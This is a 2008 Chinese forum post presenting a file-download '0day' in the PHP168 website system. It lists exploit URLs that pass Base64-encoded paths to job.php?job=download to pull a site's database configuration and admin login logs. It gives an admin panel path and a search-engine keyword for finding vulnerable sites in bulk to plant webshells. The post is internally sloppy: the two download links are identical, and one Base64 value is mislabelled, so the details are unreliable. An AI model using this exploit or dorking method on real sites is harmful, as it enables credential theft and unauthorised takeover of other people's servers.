返回首页

PHP168整站系统0DAY

时间:2008-11-03 来源: 作者: 点击:
首先说明下是这个洞是在其他地方看到的,只是他没有说的很清楚,好多菜菜都不明白,我就拿这发我的第一个贴吧! 这个洞其实就是利用了程序的编码漏洞,下载配置和登陆日志文件,一下是利用方法。 下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。 http:
  

首先说明下是这个洞是在其他地方看到的,只是他没有说的很清楚,好多菜菜都不明白,我就拿这发我的第一个贴吧!
这个洞其实就是利用了程序的编码漏洞,下载配置和登陆日志文件,一下是利用方法。

下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

程序后台:http://dabei.org/admin/index.php?iframe=1

Base64加密代码:

http://dabei.org//cache/adminlogin_logs.php  ==  "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的)

http://dabei.org//php168/mysql_config.php  ==  "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="  (引号里面的是Base64加密后的)

批量抓webshell:
google,baidu   输入关键字:Powered by PHP168
 

------分隔线----------------------------
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
最新评论 查看所有评论
发表评论 查看所有评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 密码: 验证码:
推荐内容